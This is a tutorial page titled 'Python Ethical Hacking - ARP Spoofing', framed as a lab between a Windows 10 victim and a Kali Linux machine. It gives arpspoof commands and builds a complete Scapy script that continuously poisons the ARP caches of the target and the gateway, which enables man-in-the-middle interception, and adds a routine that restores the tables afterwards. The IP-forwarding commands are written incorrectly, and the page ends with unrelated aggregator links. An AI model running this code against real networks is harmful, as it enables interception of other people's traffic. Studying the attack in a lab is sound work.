Python Ethical Hacking - ARP Spoofing
Typical Network
ARP Spoofing
Why ARP Spoofing is possible:
1. Clients accept responses even if they did not send a request.
2. Clients trust response without any form of verification.
1. Run the following command on the victim - Windows 10 Machine.
arp -a
2. Run the following command on the Kali Linux machine.
arp -a
3. Use the tool arpspoof on the Kali Linux to perform the test.
arpspoof -i eth1 -t 10.0.0.210 10.0.0.1 arpspoof -i eth1 -t 10.0.0.1 10.0.0.210
3. Perform the following command again on the victim Windows 10 machine. The MAC address of the router changed to the MAC address of Kali Linux.
arp -a
4. Run the command on Kali Linux.
echo > /proc/sys/net/ipv4/ip_forward
4. Find useful information on the Kali and write the Python code.
#!/usr/bin/env python import scapy.all as scapy
packet = scapy.ARP(op=2, pdst="10.0.0.210", hwdst="00:0c:29:9b:3f:26", psrc="10.0.0.1")
print(packet.show())
print(packet.summary())
Result:
Python Script:
#!/usr/bin/env python import scapy.all as scapy
packet = scapy.ARP(op=2, pdst="10.0.0.210", hwdst="00:0c:29:9b:3f:26", psrc="10.0.0.1")
scapy.send(packet)
Execute the script on Kali and watch the change on the victim Windows 10 machine.
Rewrite the Python Script.
#!/usr/bin/env python import scapy.all as scapy def get_mac(ip):
arp_request = scapy.ARP(pdst=ip)
broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
arp_request_broadcast = broadcast/arp_request
answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0] return answered_list[0][1].hwsrc def spoof(target_ip, spoof_ip):
target_mac = get_mac(target_ip)
packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
scapy.send(packet) spoof("10.0.0.210", "10.0.0.1")
spoof("10.0.0.1", "10.0.0.210")
Execute the script and watch the change on victim Windows 10 machine.
Rewrite the Python script to perform the spoof continuously.
#!/usr/bin/env python import scapy.all as scapy
import time def get_mac(ip):
arp_request = scapy.ARP(pdst=ip)
broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
arp_request_broadcast = broadcast/arp_request
answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0] return answered_list[0][1].hwsrc def spoof(target_ip, spoof_ip):
target_mac = get_mac(target_ip)
packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
scapy.send(packet) while True:
spoof("10.0.0.210", "10.0.0.1")
spoof("10.0.0.1", "10.0.0.210")
time.sleep(2)
Enable the IP forward on Kali Linux.
echo /proc/sys/net/ipv4/ip_forward
Now the target Win10 machine can browse the Internet normally.
Use the while structure to show the packets sent count.
#!/usr/bin/env python import scapy.all as scapy
import time def get_mac(ip):
arp_request = scapy.ARP(pdst=ip)
broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
arp_request_broadcast = broadcast/arp_request
answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0] return answered_list[0][1].hwsrc def spoof(target_ip, spoof_ip):
target_mac = get_mac(target_ip)
packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
scapy.send(packet, verbose=False) sent_packets_count = 0
while True:
spoof("10.0.0.210", "10.0.0.1")
spoof("10.0.0.1", "10.0.0.210")
sent_packets_count = sent_packets_count + 2
print("[+] Packets sent:" + str(sent_packets_count))
time.sleep(2)
Execute the Python script.
Rewrite the Python Script in Python2:
#!/usr/bin/env python import scapy.all as scapy
import time
import sys def get_mac(ip):
arp_request = scapy.ARP(pdst=ip)
broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
arp_request_broadcast = broadcast/arp_request
answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0] return answered_list[0][1].hwsrc def spoof(target_ip, spoof_ip):
target_mac = get_mac(target_ip)
packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
scapy.send(packet, verbose=False) sent_packets_count = 0
while True:
spoof("10.0.0.210", "10.0.0.1")
spoof("10.0.0.1", "10.0.0.210")
sent_packets_count = sent_packets_count + 2
print("\r[+] Packets sent:" + str(sent_packets_count)),
sys.stdout.flush()
time.sleep(2)
Execute the new script and find the change in the terminal.
Rewrite the script in Python3 compatibility :
#!/usr/bin/env python import scapy.all as scapy
import time def get_mac(ip):
arp_request = scapy.ARP(pdst=ip)
broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
arp_request_broadcast = broadcast/arp_request
answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0] return answered_list[0][1].hwsrc def spoof(target_ip, spoof_ip):
target_mac = get_mac(target_ip)
packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
scapy.send(packet, verbose=False) sent_packets_count = 0
while True:
spoof("10.0.0.210", "10.0.0.1")
spoof("10.0.0.1", "10.0.0.210")
sent_packets_count = sent_packets_count + 2
print("\r[+] Packets sent:" + str(sent_packets_count), end="")
time.sleep(2)
HANDLING EXCEPTIONS
- try/except can be used to handle errors.
- Write default code in a try block.
- Write code to run if an error occurs in except block.
-> if an error occurs exception block gets executed, otherwise try code gets executed.
Using the try ... catch structure to handle the KeyboardInterrupt Error.
#!/usr/bin/env python import scapy.all as scapy
import time
import sys def get_mac(ip):
arp_request = scapy.ARP(pdst=ip)
broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
arp_request_broadcast = broadcast/arp_request
answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0] return answered_list[0][1].hwsrc def spoof(target_ip, spoof_ip):
target_mac = get_mac(target_ip)
packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
scapy.send(packet, verbose=False) sent_packets_count = 0
while True:
spoof("10.0.0.210", "10.0.0.1")
spoof("10.0.0.1", "10.0.0.210")
sent_packets_count = sent_packets_count + 2
print("\r[+] Packets sent:" + str(sent_packets_count)),
sys.stdout.flush()
time.sleep(2)
Execution result:
Rewrite the Python Script to restore the network after quite.
#!/usr/bin/env python import scapy.all as scapy
import time
import sys def get_mac(ip):
arp_request = scapy.ARP(pdst=ip)
broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
arp_request_broadcast = broadcast/arp_request
answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0] return answered_list[0][1].hwsrc def spoof(target_ip, spoof_ip):
target_mac = get_mac(target_ip)
packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
scapy.send(packet, verbose=False) def restore(destination_ip, source_ip):
destination_mac = get_mac(destination_ip)
source_mac = get_mac(source_ip)
packet = scapy.ARP(op=2, pdst=destination_ip, hwdst=destination_mac, psrc=source_ip, hwsrc=source_mac)
scapy.send(packet, count=4, verbose=False) target_ip = "10.0.0.210"
gateway_ip = "10.0.0.1" sent_packets_count = 0
try:
while True:
spoof(target_ip, gateway_ip)
spoof(gateway_ip, target_ip)
sent_packets_count = sent_packets_count + 2
print("\r[+] Packets sent:" + str(sent_packets_count)),
sys.stdout.flush()
time.sleep(2)
except KeyboardInterrupt:
print("[+] Detected CTRL+C ...... Resetting ARP tables...... Please wait")
restore(target_ip, gateway_ip)
restore(gateway_ip, target_ip)
Python Ethical Hacking - ARP Spoofing的更多相关文章
- Python Ethical Hacking - DNS Spoofing
What is DNS Spoofing Sniff the DNSRR packet and show on the terminal. #!/usr/bin/env python from net ...
- Python Ethical Hacking - Bypass HTTPS(1)
HTTPS: Problem: Data in HTTP is sent as plain text. A MITM can read and edit requests and responses. ...
- Python Ethical Hacking - NETWORK_SCANNER(2)
DICTIONARIES Similar to lists but use key instead of an index. LISTS List of values/elements, all ca ...
- Python Ethical Hacking - NETWORK_SCANNER(1)
NETWORK_SCANNER Discover all devices on the network. Display their IP address. Display their MAC add ...
- Python Ethical Hacking - BACKDOORS(8)
Cross-platform hacking All programs we wrote are pure python programs They do not rely on OS-specifi ...
- Python Ethical Hacking - ARPSpoof_Detector
ARPSPOOF_DETECTOR Watch value for gateway mac in the arp table Nice and simple, but will not detect ...
- Python Ethical Hacking - MAC Address & How to Change(3)
SIMPLE ALGORITHM Goal -> Check if MAC address was changed. Steps: 1. Execute and read ifconfig. ...
- Python Ethical Hacking - MAC Address & How to Change(2)
FUNCTIONS Set of instructions to carry out a task. Can take input, and return a result. Make the cod ...
- Python Ethical Hacking - MAC Address & How to Change(1)
MAC ADDRESS Media Access Control Permanent Physical Unique Assigned by manufacturer WHY CHANGE THE M ...
随机推荐
- LeetCode 题解目录
前言 本目录将不断更新记录leetcode的刷题日记. 二叉树 序号 标题 难度 标签 1 108 将有序数组转换为二叉搜索树 简单 树.深度优先搜索 2 538 把二叉搜索树转换为累加树 简单 树 ...
- 【hdoj】哈希表题hdoj1425
hdoj1425 github链接 #include<cstdio> #include<cstring> using namespace std; const int offs ...
- Java 中的线程 thread
一.问:线程有哪些状态? new, runnable, running, waiting, dead 线程状态间的流转 二.问:线程实现方式? 实现 Runnable 接口,然后new Thread, ...
- opencv c++访问某一区域
int main(){ cv::Mat m1(,, CV_8UC1); for(int i=;i<m1.rows;++i) for(int j=;j<m1.cols;++j) m1.at& ...
- 三文搞懂学会Docker容器技术(中)
接着上面一篇:三文搞懂学会Docker容器技术(上) 6,Docker容器 6.1 创建并启动容器 docker run [OPTIONS] IMAGE [COMMAND] [ARG...] --na ...
- C#数据结构与算法系列(十九):选择排序算法(SelectSort)
1.介绍 选择排序算法属于内部排序算法,是从欲排序的数据中,按指定的规则选出某一元素,再依规定交换位置达到排序的目的 时间复杂度:O(n^2) 双层for 2.思想 选择排序(select sorti ...
- Flask项目实战:创建电影网站(2)
flask网站制作后台时候常见流程总结 安利一个神神器: 百度脑图PC版 创建数据库 下面是创建User数据库,需要导入db库 #coding:utf8 from flask import Flask ...
- 半导体质量管理(LineWorks)_SPACE(统计过程分析和控制环境)
LineWorks作为SEMI的质量管理,可为半导体制造商提供对实施标准,产品质量,质量和指标验证的全面控制.有许多附加模块和SPACE-Chart插件,可根据个人需求进行灵活调整. 三个主要特征是: ...
- LeetCode 81,在不满足二分的数组内使用二分法 II
本文始发于个人公众号:TechFlow,原创不易,求个关注 今天是LeetCode专题第50篇文章,我们来聊聊LeetCode中的81题Search in Rotated Sorted ArrayII ...
- µDoo持有者将分享我们广告总收入的10%,并以BTC支付!
Jason8th October 2019 在数字化世界中,去中心化将是未来,Howdoo的社交媒体和内容交付理念为在新经济中使用的核心用户提供了公平.透明的奖励回报.随着Howdoo上的内容创作者有 ...